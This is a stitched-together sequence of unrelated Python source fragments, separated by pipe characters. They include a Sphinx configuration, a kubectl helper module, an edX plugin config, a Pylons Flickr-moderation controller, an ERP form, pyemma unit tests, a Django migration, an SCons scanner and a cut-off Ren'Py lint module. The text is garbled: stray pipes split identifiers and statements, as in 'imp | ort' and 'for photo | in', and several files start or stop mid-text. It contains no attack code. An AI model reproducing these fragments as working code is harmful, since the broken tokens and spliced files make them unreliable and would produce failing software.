# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes. |
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each them | e, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'tm1640-rpidoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'tm1640-rpi.tex', u'tm1640-rpi Documentation',
u'Michael Farrell', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tm1640-rpi', u'tm1640-rpi Documentation',
[u'Michael Farrell'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'tm1640-rpi', u'tm1640-rpi Documentation',
u'Michael Farrell', 'tm1640-rpi', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
autoclass_content = 'both'
|
# encoding: utf-8
import json
import time
from kubectl_data import *
from kubectl_ports import *
from kubectl_wrapper import *
TMP_FILEPATH = '/tmp/'
def create_tmp_json(data, service_path):
    """Serialize ``data`` as pretty-printed (indent=2) JSON at ``service_path``."""
    serialized = json.dumps(data, indent=2)
    with open(service_path, 'w') as out:
        out.write(serialized)
def sub_start(service_name, data, kube_type):
    """Create the kubernetes resource of ``kube_type`` for a service by
    dumping its spec to a temp JSON file and passing it to ``create``."""
    filepath = TMP_FILEPATH + service_name + '-' + kube_type + '.json'
    kube_data = data.get(kube_type, dict())
    create_tmp_json(kube_data, filepath)
    create(filepath)
def sub_stop(service_name, data, kube_type):
    """Delete the kubernetes resource of ``kube_type`` for a service using
    a freshly dumped spec file and ``delete``."""
    filepath = TMP_FILEPATH + service_name + '-' + kube_type + '.json'
    kube_data = data.get(kube_type, dict())
    create_tmp_json(kube_data, filepath)
    delete(filepath)
'''
Actions
'''
def kubectl_used_ports(subdomain):
    """Return the ports already allocated in the given subdomain."""
    return get_used_ports(subdomain)
def kubectl_available_ports(subdomain):
    """Return the ports still free in the given subdomain."""
    return get_available_ports(subdomain)
def kubectl_register(filepath):
    """Load a service definition from a YAML file and register it."""
    data = get_data_yaml(filepath)
    register_data(data)
def kubectl_start(service_name):
    """Start a registered service: the service object first, then its
    replication controller, with a short pause in between."""
    data = get_data(service_name)
    sub_start(service_name, data, 'service')
    time.sleep(1)
    sub_start(service_name, data, 'replicationcontroller')
def kubectl_stop(service_name):
    """Stop a service: the replication controller first, then the service."""
    data = get_data(service_name)
    sub_stop(service_name, data, 'replicationcontroller')
    sub_stop(service_name, data, 'service')
    time.sleep(1)
def kubectl_list():
    """Return the names of all registered services."""
    return get_all_names()
def kubectl_startall():
    """Start every registered service."""
    services = get_all_names()
    for service in services:
        kubectl_start(service)
def kubectl_status(ressources, all_namespaces):
    """Proxy to ``status`` for the given resources / namespace scope."""
    return status(ressources, all_namespaces)
def kubectl_status_nodes():
    """Proxy to ``nodes``: report cluster node status."""
    return nodes()
def kubectl_logs(service_name, f):
    """Show logs for a pod belonging to ``service_name``.

    ``f`` is passed through to ``logs`` (presumably the follow flag —
    confirm against kubectl_wrapper).  If the service label matches
    several pods, the user is asked to pick one by name.
    """
    pods = pods_name_from_label(service_name)
    pods_list = filter(lambda x: x != '', pods.split('\n'))
    if not pods_list:
        print 'No pods found'
        return
    elif len(pods_list) > 1:
        format_list = '\n'.join(pods_list) + '\n\nName: '
        answer = raw_input('Multiple pods under this service, please choose one by selecting the name: \n' + format_list)
        return logs(answer, f)
    else:
        # Single match: the pod name is the first column of the line.
        pod_name = pods_list[0].split(' ')[0]
        return logs(pod_name, f)
def kubectl_describe(service_name):
    """Run ``describe`` against the pods of the given service."""
    found_pods_and_exec_func(service_name, describe)
def kubectl_connect(service_name):
    """Open an interactive connection to a pod of the given service."""
    found_pods_and_exec_func(service_name, connect)
|
"""
Configuration for bookmarks Django app
"""
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
from edx_django_utils.plugins import PluginSettings | , PluginURLs
from openedx.core.djangoapps.plugins.constants import ProjectType, SettingsType
class BookmarksConfig(AppConfig):
    """
    Configuration class for bookmarks Django app
    """
    name = 'openedx.core.djangoapps.bookmarks'
    verbose_name = _("Bookmarks")
    # Registers this app with the edx plugin framework: mounts its URLs
    # under /api/bookmarks/ in the LMS and pulls in per-environment settings.
    plugin_app = {
        PluginURLs.CONFIG: {
            ProjectType.LMS: {
                PluginURLs.NAMESPACE: '',
                PluginURLs.REGEX: '^api/bookmarks/',
                PluginURLs.RELATIVE_PATH: 'urls',
            }
        },
        PluginSettings.CONFIG: {
            ProjectType.LMS: {
                SettingsType.PRODUCTION: {PluginSettings.RELATIVE_PATH: 'settings.production'},
                SettingsType.COMMON: {PluginSettings.RELATIVE_PATH: 'settings.common'},
            }
        }
    }
    def ready(self):
        """Connect this app's signal handlers once Django has loaded."""
        # Register the signals handled by bookmarks.
        from . import signals  # lint-amnesty, pylint: disable=unused-import
|
import logging
from pylons import config, request, response, session, tmpl_context as c
from pylons.controllers.util import abort
from fmod.lib.base import BaseController, render
from fmod import model
from sqlalchemy import desc
log = logging.getLogger(__name__)
from hashlib import md5
import time, datetime
#useful for this case.
from fmod.model import Ping, ImageHistory
from flickrapi import FlickrAPI
class PingController(BaseController):
    def index(self):
        """Render the moderation page with up to 2 undecided pings whose
        images are still in the group pool.

        Pings whose image has left the pool are marked decided as a side
        effect, committed in one batch at the end.
        """
        c.results=[]
        c.username = session.get('user')
        c.fl_mod = session.get('mod',False)
        images = {}  # image ids already queued, to avoid duplicates
        flSave = False
        for ping in Ping.query().filter(Ping.fl_decided==False).order_by(Ping.id):
            if not images.get(ping.image):
                img = ping.Image_fromPing()
                if img.in_pool():
                    images[ping.image] = True
                    c.results.append(ping)
                    if len(c.results) >= 2:
                        break
                else:
                    # Image left the pool: nothing to moderate, auto-decide.
                    flSave=True
                    ping.fl_decided=True
        if flSave: ping.commit()
        return render('ping.mako')
    def more(self, id=None):
        """Render the next undecided ping after the one named by ``id``.

        ``id`` is a DOM id like ``d_ping_<ping.id>``; only the numeric
        suffix is used.  Returns "" when the id cannot be parsed.
        """
        # id will be something like d_ping_[ping.id]
        # so, I want to get a ping where id > that one.
        pid = id.split('_')[-1]
        try:
            pid = int(pid)
        except:
            log.debug("couldn't identify the ping %s "%id)
            return ""
        c.username = session.get('user')
        c.fl_mod = session.get('mod',False)
        # Images already shown at or before pid, to skip duplicates.
        filter_images = dict([(ping.image,True) for ping in
                Ping.query().filter(Ping.fl_decided==False).filter(Ping.id<=pid)])
        for ping in Ping.query().filter(Ping.fl_decided==False).filter(Ping.id>pid).order_by(Ping.id):
            if not ping.image in filter_images:
                img = ping.Image_fromPing()
                if img.in_pool():
                    c.ping=ping
                    c.image=ping.image
                    c.atts = img.all_atts()
                    return render('one_ping.mako')
                else:
                    # Image left the pool: auto-decide and keep scanning.
                    ping.fl_decided=True
                    ping.commit()
def _fmtTime(self, t=None):
if t!= None and hasattr(t, 'timetuple'):
t = time.mktime(t.timetuple())
return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(t))
def rss(self):
response.charset='utf8'
response.headers['content-type'] = 'text/xml; charset=UTF-8'
c.items=[]
images = {}
for ping in Ping.query().filter(Ping.fl_decided==False).order_by(desc(Ping.id)):
if not images.get(ping.image):
img = ping.Image_fromPing()
if img.in_pool():
images[ping.image] = True
img.all_atts()
c.items.append((ping,img))
if len(c.results) >= 20:
break
c.fmtTime = self._fmtTime
return render('rss.mako')
def ping(self):
log.debug('In Ping')
params = {'nsid':'nsid', # the pinging user, this is static.
'uid':'username', # our userid
'id' :'image', # image id
'own':'owner', # image owner
'sec':'secret', # image secret, from flickr
'con':'context', # context - in group pool
}
# 's':None # signature
# check sig --
nsid = request.params.get('nsid')
if nsid:
u = model.User.get_byNsid(nsid)
else:
u = model.User.get_byName(request.params.get('uid'))
if not u:
log.debug('user not found for ping: %s'%request.query_string)
return ''
log.debug(request.query_string)
log.debug(request.query_string[:-35]+u.secret)
log.debug(request.params.get('s'))
log.debug(md5(request.query_string[:-35]+u.secret).hexdigest().lower())
if md5(request.query_string[:-35]+u.secret).hexdigest().lower() != request.params.get('s'):
log.debug('bad signature')
return ''
else:
log.debug('good signature')
p = Ping()
for (arg, att) in params.items():
# must filter!!!
val = request.params.get(arg,'')
log.debug("setting %s to %s"% (att, val))
if val:
setattr(p, att, val)
p.username = u.username
#p.begin()
p.save()
p.commit()
if request.params.get('v',False) == '2':
#version 2 response.
response.headers['content-type'] = 'text/javascript'
return """YUI().use('node', function(Y) {Y.one('#context-num-pool-71917374__at__N00').insert(document.createTextNode(' (Flagged) '), 'before')})"""
else:
#version 1 response
""" q='uid='+uid+'&id='+p.id+'&own='+p.ownerNsid+'&sec='+p.secret+'&con='+nextprev_currentContextID;
i.src='http://192.168.10.99:5000/p?'+q+'s='+md5_calcMD5(q+s);
"""
response.headers['content-type'] = 'text/javascript'
return """Y.D.get('contextTitle_pool71917374@N00').appendChild(document.createTextNode('(Flagged)'))"""
def dup_scan(self):
log.debug('dup ping')
fapi = FlickrAPI(config['api_key'], config['api_secret'], token=config['api_token'])
try:
rsp = fapi.groups_pools_getPhotos(api_key=config['api_key'],
group_id=config['group_id'],
extras='last_update',
per_page='50',
page='1',
token=config['api_token'])
except Exception,msg:
log.debug(msg.args)
return False
photos = rsp.find('photos')
for photo | in photos.getchildren():
image = photo.get('id')
dt = int(photo.get('dateadded'))
if ImageHistory.get(image=image, dt=dt):
log.debug('found high water mark, quitting')
break
if ImageHistory.get_all(image=image):
log.debug('found a re-add')
p = Ping()
p.image = image
p.owner = photo.get('owner')
p.reason = "Bump"
p.username = 'RoboMod'
p.save()
Ping.commit | ()
ih = ImageHistory()
ih.image = image
ih.dt = dt
ih.save()
ImageHistory.commit()
return "successful"
|
from api imp | ort ServerError,NoAccessError,Simp | leTax
|
# !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = 'CVtek dev'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "CVTek dev"
__status__ = "Development"
__model_name__ = 'sr_crianca.SRCrianca'
import auth, base_models
from orm import *
from form import *
class SRCrianca(Model, View):
    """Child enrollment and identification record ("Inscrição e
    Identificação da Criança").

    Purely declarative: __init__ registers form metadata and all form
    fields.  Related pre-natal / neo-natal records and siblings appear
    as tabbed inline lists.
    """
    def __init__(self, **kargs):
        Model.__init__(self, **kargs)
        self.__name__ = 'sr_crianca'
        self.__title__ ='Inscrição e Identificação da Criança'
        self.__model_name__ = __model_name__
        self.__list_edit_mode__ = 'edit'
        self.__get_options__ = ['nome'] # also sets the field shown in m2m widgets, regardless of the m2m field's description
        self.__order_by__ = 'sr_crianca.nome'
        self.__tabs__ = [
            ('Pré-Natal', ['sr_pre_natal']),
            ('Neo-Natal', ['sr_neo_natal']),
            ('Irmãos', ['sr_crianca']),
        ]
        # (original note, translated) a choice field with the health
        # facility ("estrutura de saude") is still wanted here.
        # Field declarations: view_order fixes on-screen ordering and
        # onlist controls list-view visibility.
        self.numero_inscricao = integer_field(view_order = 1, name = 'Nº de Inscrição', size = 40)
        self.primeira_consulta = date_field(view_order = 2, name = 'Primeira Consulta', size=40, args = 'required', default = datetime.date.today(), onlist = False)
        self.nome = string_field(view_order = 3, name = 'Nome', size = 70, onlist = True)
        self.sexo = combo_field(view_order = 4, name = 'Sexo', size = 40, default = 'Feminino', options = [('feminino','Feminino'), ('masculino','Masculino')], onlist = True)
        self.data_nascimento = date_field(view_order = 5, name = 'Data Nascimento', size=40, args = 'required', onlist = True)
        self.hora_nascimento = time_field(view_order=7, name ='Hora Nascimento', size=40, onlist=False, args='required')
        self.numero_registo = string_field(view_order = 8, name = 'Nº Registo', size = 40, onlist = False)
        self.data_registo = date_field(view_order = 9, name = 'Data Registo', size=40, args = 'required')
        self.nome_pai = string_field(view_order = 10, name = 'Nome do Pai', size = 60, onlist=False)
        # NOTE(review): label reads 'Nome do Mãe' (likely should be
        # 'da Mãe'); left untouched because it is a runtime string.
        self.nome_mae = string_field(view_order = 11, name = 'Nome do Mãe', size = 60)
        self.endereco_familia = text_field(view_order=12, name='Endereço Familia', size=70, args="rows=30", onlist=False, search=False)
        self.telefone = string_field(view_order = 13, name = 'Telefone', size = 40, onlist = True)
        self.estado = combo_field(view_order = 14, name = 'Estado', size = 40, default = 'active', options = [('active','Activo'), ('canceled','Cancelado')], onlist = True)
        # Inline child lists, shown on the tabs declared above.
        self.sr_pre_natal = list_field(view_order=15, name = 'Informações Pré-Natal', fields=['duracao_gravidez'], condition="crianca='{id}'", model_name='sr_pre_natal.SRPreNatal', list_edit_mode='inline', onlist = False)
        self.sr_neo_natal = list_field(view_order=16, name = 'Informações Neo-Natal', column='local_parto', condition="sr_crianca='{id}'", model_name='sr_neo_natal.SRNeoNatal', list_edit_mode='inline', onlist = False)
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Free University
# Berlin, 14195 Berlin, Germany.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on 07.04.2015
@author: marscher
'''
import unittest
import tempfile
import numpy as np
from pyemma.coordinates.data.numpy_filereader import NumPyFileReader
from pyemma.util.log import getLogger
import shutil
class TestNumPyFileReader(unittest.TestCase):
    """Round-trip tests for NumPyFileReader over generated .npy fixtures."""

    @classmethod
    def setUpClass(cls):
        # BUG FIX: the old code used getLogger(cls.__class__.__name__);
        # inside a classmethod cls.__class__ is the metaclass, so every
        # logger was named "type" instead of the test class name.
        cls.logger = getLogger(cls.__name__)

        d = np.arange(3 * 100).reshape((100, 3))
        d2 = np.arange(300, 900).reshape((200, 3))
        d_1d = np.random.random(100)

        cls.dir = tempfile.mkdtemp(prefix='pyemma_npyreader')

        cls.f1 = tempfile.mktemp(suffix='.npy', dir=cls.dir)
        cls.f2 = tempfile.mktemp(suffix='.npy', dir=cls.dir)
        cls.f3 = tempfile.mktemp(suffix='.npz', dir=cls.dir)
        cls.f4 = tempfile.mktemp(suffix='.npy', dir=cls.dir)

        # 2d
        np.save(cls.f1, d)
        np.save(cls.f4, d2)
        # 1d
        np.save(cls.f2, d_1d)
        np.savez(cls.f3, d, d)

        cls.files2d = [cls.f1, cls.f4]  # cls.f3]
        cls.files1d = [cls.f2]
        cls.d = d
        cls.d_1d = d_1d
        cls.npy_files = [f for f in cls.files2d if f.endswith('.npy')]
        cls.npz = cls.f3
        # (the old 'return cls' was dropped -- unittest ignores
        # setUpClass return values)

    @classmethod
    def tearDownClass(cls):
        # Remove the fixture directory; ignore_errors tolerates files
        # already deleted.
        shutil.rmtree(cls.dir, ignore_errors=True)

    def _assert_output_matches_files(self, reader):
        # Shared checks: trajectory count, total frame count, and
        # per-file equality of reader output with np.load contents.
        from_files = [np.load(f) for f in self.npy_files]
        concatenated = np.vstack(from_files)
        output = reader.get_output()
        self.assertEqual(reader.number_of_trajectories(), len(self.npy_files))
        self.assertEqual(reader.n_frames_total(), concatenated.shape[0])
        for x, y in zip(output, from_files):
            np.testing.assert_array_almost_equal(x, y)

    def test_only_npy(self):
        """Default chunksize: output equals the saved arrays."""
        self._assert_output_matches_files(NumPyFileReader(self.npy_files))

    def test_small_chunks(self):
        """A chunksize smaller than the files must not change the output."""
        reader = NumPyFileReader(self.npy_files)
        reader.chunksize = 30
        self._assert_output_matches_files(reader)

    def testSingleFile(self):
        """A single path (not a list) is accepted."""
        reader = NumPyFileReader(self.npy_files[0])
        self.assertEqual(reader.n_frames_total(), self.d.shape[0])

    @unittest.skip("npz currently unsupported")
    def test_npz(self):
        reader = NumPyFileReader(self.npz)
        all_data = reader.get_output()
        fh = np.load(self.npz)
        data = [x[1] for x in fh.items()]
        fh.close()
        self.assertEqual(reader.number_of_trajectories(), len(data))
        for outp, inp in zip(all_data, data):
            np.testing.assert_equal(outp, inp)

    def test_stridden_access(self):
        """get_output(stride=k) equals plain numpy slicing [::k]."""
        reader = NumPyFileReader(self.f1)
        reader.chunksize = 10
        wanted = np.load(self.f1)
        for stride in [2, 3, 5, 7, 15]:
            first_traj = reader.get_output(stride=stride)[0]
            np.testing.assert_equal(first_traj, wanted[::stride],
                                    "did not match for stride %i" % stride)

    def test_lagged_stridden_access(self):
        """Lagged, strided iteration equals d[lag::stride]."""
        reader = NumPyFileReader(self.f1)
        strides = [2, 3, 5, 7, 15]
        lags = [1, 3, 7, 10, 30]
        for stride in strides:
            for lag in lags:
                chunks = []
                for _, _, Y in reader.iterator(stride, lag):
                    chunks.append(Y)
                chunks = np.vstack(chunks)
                np.testing.assert_equal(chunks, self.d[lag::stride])

    def test_lagged_stridden_access_multiple_files(self):
        """Same as above, per trajectory, across several files."""
        reader = NumPyFileReader(self.files2d)
        print(reader.trajectory_lengths())  # was a Python-2 print statement
        strides = [2, 3, 5, 7, 15]
        lags = [1, 3, 7, 10, 30]
        for stride in strides:
            for lag in lags:
                chunks = {i: [] for i in range(reader.number_of_trajectories())}
                for itraj, _, Y in reader.iterator(stride, lag):
                    chunks[itraj].append(Y)
                # BUG FIX: iterate by explicit trajectory index.  The old
                # enumerate(chunks.itervalues()) relied on dict iteration
                # order matching 0..n-1, which is not guaranteed (and
                # itervalues()/xrange are Python-2 only).
                for i in range(reader.number_of_trajectories()):
                    stack = np.vstack(chunks[i])
                    d = np.load(self.files2d[i])
                    np.testing.assert_equal(stack, d[lag::stride],
                                            "not equal for stride=%i"
                                            " and lag=%i" % (stride, lag))
if __name__ == "__main__":
    # Allow running this test module directly, outside a test runner.
    unittest.main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-03 08:56
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 1.10, 2016-11-03).

    Adds the ``Inscription`` join model (profile <-> journey with
    metadata), the ``Profile`` one-to-one extension of the auth user,
    and exposes the relation on ``Journey`` as an ``inscriptions``
    many-to-many field through ``Inscription``.
    """

    dependencies = [
        # Requires the (swappable) user model and the app's previous state.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('snapventure', '0004_auto_20161102_2043'),
    ]

    operations = [
        migrations.CreateModel(
            name='Inscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('journey', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Journey')),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bio', models.TextField(blank=True, max_length=500)),
                ('location', models.CharField(blank=True, max_length=30)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Added separately because Inscription references Profile,
        # which is created just above.
        migrations.AddField(
            model_name='inscription',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Profile'),
        ),
        migrations.AddField(
            model_name='journey',
            name='inscriptions',
            field=models.ManyToManyField(through='snapventure.Inscription', to='snapventure.Profile'),
        ),
    ]
|
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Scanner/Dir.py 2014/09/27 12:51:43 garyo"
import SCons.Node.FS
| import SCons.Scanner
def only_dirs(nodes):
    """Return only those *nodes* whose disambiguated type is a Dir."""
    dirs = []
    for node in nodes:
        if isinstance(node.disambiguate(), SCons.Node.FS.Dir):
            dirs.append(node)
    return dirs
def DirScanner(**kw):
    """Build a prototype Scanner that reads a directory's on-disk
    contents; recursion descends only into Dir nodes."""
    kw.update(node_factory=SCons.Node.FS.Entry, recursive=only_dirs)
    return SCons.Scanner.Base(scan_on_disk, "DirScanner", **kw)
def DirEntryScanner(**kw):
    """Build a prototype Scanner that lists a directory Node's in-memory
    entries without touching the disk (and without recursing)."""
    kw.update(node_factory=SCons.Node.FS.Entry, recursive=None)
    return SCons.Scanner.Base(scan_in_memory, "DirEntryScanner", **kw)
# Directory entries that must never be reported by a scan: the
# navigation entries plus every flavor of .sconsign signature database.
skip_entry_list = [
    '.',
    '..',
    '.sconsign',
    # Used by the native dblite.py module.
    '.sconsign.dblite',
    # Used by dbm and dumbdbm.
    '.sconsign.dir',
    # Used by dbm.
    '.sconsign.pag',
    # Used by dumbdbm.
    '.sconsign.dat',
    '.sconsign.bak',
    # Used by some dbm emulations using Berkeley DB.
    '.sconsign.db',
]

# Index both the literal and the case-normalized spelling for O(1) lookup.
skip_entry = {}
for entry_name in skip_entry_list:
    skip_entry[entry_name] = 1
    skip_entry[SCons.Node.FS._my_normcase(entry_name)] = 1

do_not_scan = lambda k: k not in skip_entry
def scan_on_disk(node, env, path=()):
    """
    Scan a directory for the files and directories it contains on disk.

    Looking each name up through node.Entry() materializes it in the
    in-memory Node tree, after which the in-memory scan produces the
    complete result.
    """
    try:
        flist = node.fs.listdir(node.abspath)
    except (IOError, OSError):
        # Unreadable or missing directory: nothing to report.
        return []
    entry = node.Entry
    for fname in flist:
        if do_not_scan(fname):
            # The './' prefix keeps names starting with '#' from being
            # looked up relative to the top-level directory.
            entry('./' + fname)
    return scan_in_memory(node, env, path)
def scan_in_memory(node, env, path=()):
    """
    Return the already-materialized entries of a Node.FS.Dir, sorted by
    name, with bookkeeping entries filtered out.
    """
    try:
        entries = node.entries
    except AttributeError:
        # Not a Node.FS.Dir (mixed target lists may put a File first),
        # so there is nothing to scan.
        return []
    names = [name for name in entries.keys() if do_not_scan(name)]
    names.sort()
    return [entries[name] for name in names]
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
ED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import renpy
import codecs
import os
import os.path
import time
image_prefixes = None
filenames = None
# Things to check in lint.
#
# Image files exist, and are of the right case.
# Jump/Call targets defined.
# Say whos can evaluate.
# Call followed by say.
# Show/Scene valid.
# At valid.
# With valid.
# Hide maybe valid.
# Expressions can compile.
# The node the report will be about:
report_node = None

# Reports a message to the user.
def report(msg, *args):
    """Print one lint report line, prefixed with the current node's
    file:line position when report_node is set.

    ``msg`` is a %-style format string applied to ``args``.
    """
    if report_node:
        out = u"%s:%d " % (renpy.parser.unicode_filename(report_node.filename), report_node.linenumber)
    else:
        out = ""
    out += msg % args
    # Python 2 print statements: a blank separator line, then the
    # UTF-8 encoded report text.
    print
    print out.encode('utf-8')
# Messages already emitted by add(), used to suppress repeats.
added = { }

# Reports additional information about a message, the first time it
# occurs.
def add(msg):
    """Print ``msg`` once per lint run; later identical calls are no-ops."""
    if not msg in added:
        added[msg] = True
        # Python 2 print statement; unicode() then UTF-8 encode.
        print unicode(msg).encode('utf-8')
# Trys to evaluate an expression, announcing an error if it fails.
def try_eval(where, expr, additional=None):
    """Evaluate *expr* with Ren'Py's evaluator, reporting (not raising)
    on failure; *additional* is an optional one-time hint via add()."""
    try:
        renpy.python.py_eval(expr)
        return
    except:
        pass
    report("Could not evaluate '%s', in %s.", expr, where)
    if additional:
        add(additional)
# Returns True of the expression can be compiled as python, False
# otherwise.
def try_compile(where, expr):
    """Report a lint error when *expr* does not compile as a Python
    expression."""
    compiled_ok = True
    try:
        renpy.python.py_compile_eval_bytecode(expr)
    except:
        compiled_ok = False
    if not compiled_ok:
        report("'%s' could not be compiled as a python expression, %s.", expr, where)
# This reports an error if we're sure that the image with the given name
# does not exist.
def image_exists(name, expression, tag):
    """Report when no declared image matches any prefix of *name*.

    Also records the tag (or the first name component) so later hide
    statements can be validated against it.  Expression-based shows
    cannot be checked statically and are skipped.
    """
    image_prefixes[tag or name[0]] = True

    if expression:
        return

    full_name = " ".join(name)
    parts = list(name)
    # Accept any declared image that is a prefix of the shown name.
    while parts:
        if tuple(parts) in renpy.exports.images:
            return
        del parts[-1]

    report("The image named '%s' was not declared.", full_name)
# Only check each file once.
check_file_cache = { }

def check_file(what, fn):
    """Check that file ``fn`` (used by ``what``) is loadable and that its
    on-disk case matches the case used in the script.

    Results are memoized in check_file_cache: True = known good,
    False = known unloadable (re-reported for each new use site).
    """
    present = check_file_cache.get(fn, None)
    if present is True:
        return
